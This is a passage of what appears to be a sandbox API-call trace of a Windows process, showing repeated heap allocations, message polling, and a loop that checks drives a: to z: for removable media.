returned 0x14bd340 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.462] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.462] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.464] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.464] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.464] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.464] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.465] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.465] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.465] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.465] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.465] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.466] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.466] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.466] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.466] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.466] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.467] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.467] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.467] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.467] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.467] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.467] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.468] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.468] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.468] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.468] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.468] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0218.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0218.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0218.470] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0218.470] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0218.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.470] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.473] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.473] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.473] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.473] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.474] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.474] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.474] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.475] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.475] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.475] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.475] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.475] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.476] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.476] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.476] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.476] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.476] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.477] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.477] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.477] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.477] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.478] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.478] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.478] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.479] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.479] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.479] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.479] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.479] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.480] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.480] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.480] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.480] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.481] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.481] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0218.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0218.482] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0218.482] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.483] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.483] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.483] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.483] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0218.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.484] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.484] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.484] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.484] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.484] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.485] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.485] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.485] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.485] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.485] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.485] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.486] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.486] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.486] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.486] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.486] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.487] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.487] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.487] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.487] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.487] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.488] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.488] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.488] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.488] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.488] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.489] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.489] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0218.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0218.490] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0218.490] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.491] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.491] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.491] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 